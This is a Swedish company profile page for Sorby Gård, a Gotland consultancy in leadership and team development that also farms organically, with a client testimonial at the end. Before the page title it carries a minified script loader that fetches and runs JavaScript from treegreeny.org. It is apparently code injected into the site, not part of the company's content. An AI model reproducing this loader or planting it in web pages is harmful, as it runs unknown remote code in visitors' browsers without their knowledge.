;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Om Sorby Gård | Sorby Gård

Om Sorby Gård

Sorby Gård är ett Gotländskt konsultföretag som arbetar med organisationsutveckling, ledarskap och teamutveckling. Sorby Gård är även en släktgård på norra Gotland där Britta Djurberg-Sorby och Per Henrik Sorby, vid sidan av konsultarbetet, bedriver ekologiskt lantbruk med Gotlandsfår och Växtodling.

Vi är baserade på Gotland men en stor del av våra uppdragsgivare finns på fastlandet, i första hand i mellersta och södra Sverige. Vi har arbetat med organisationsutveckling, ledarskap och teamutveckling sedan 1990 och har väl etablerade kundrelationer inom såväl privata som offentliga företag och organisationer. Våra insatser syftar till att utveckla ledningsgrupper, team och projektgrupper mot högre effektivitet och kvalitetsmedvetande samt därmed ökad lönsamhet för företaget.

Företagsledningens engagemang, vilja och förmåga vid ledning av ett förändringsarbete, är helt avgörande för ett framgångsrikt resultat. Det finns ofta en optimistisk syn på förändring både vad avser tid, resursinsats och genomförande – resultat. De tydligaste resultaten på förändring har vi sett i företag där vi arbetat återkommande under en längre tidsperiod, ibland upp till två – tre år.

Vi kan inte förändra ett företag, det kan bara företaget självt. Det vi kan bidra med är att vara bollplank, Coacher och handledare. Vi samarbetar bland andra med Effectiveness Consultants i Stockholm, MK Företagskonsult i Visby samt JB tvåsjutvå AB i Halmstad.

Sorby Gård är medlemmar i Produkt Gotland, Tillväxt Gotland och Palma.

”Sorby Gård Organisationskonsult bidrog till att minimera den ledningssvacka som kan uppstå vid ett chefsbyte. Jag upplever att jag tillsammans med ledningsgruppens övriga medlemmar fick en mycket bra start.

Jag kan rekommendera denna typ av insats och vill framhålla att det öppna klimat som Per Henrik och Britta bidrar till, tillsammans med deras förmåga att läsa in de olika medarbetarnas behov och gruppens klimat starkt bidrar till det lyckade resultatet.”

Anders Jolby

Servicedirektör, Region Gotland